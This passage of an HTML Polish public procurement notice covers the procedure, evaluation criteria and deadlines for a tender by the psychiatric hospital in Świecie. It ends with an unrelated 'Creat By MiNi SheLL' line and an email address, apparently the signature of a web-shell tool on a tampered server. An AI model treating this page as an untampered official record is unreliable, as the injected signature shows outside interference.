2) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3) charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.swiecie.regiony.pl/postepowania-w-toku<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Organizacyjno-Prawny Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych im. dr. J. Bednarza 86-100 Świecie ul. Sądowa 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2016 godzina 09:00, miejsce: Sekretariat Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych im. dr. J. Bednarza 86-100 Świecie ul. Sądowa 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com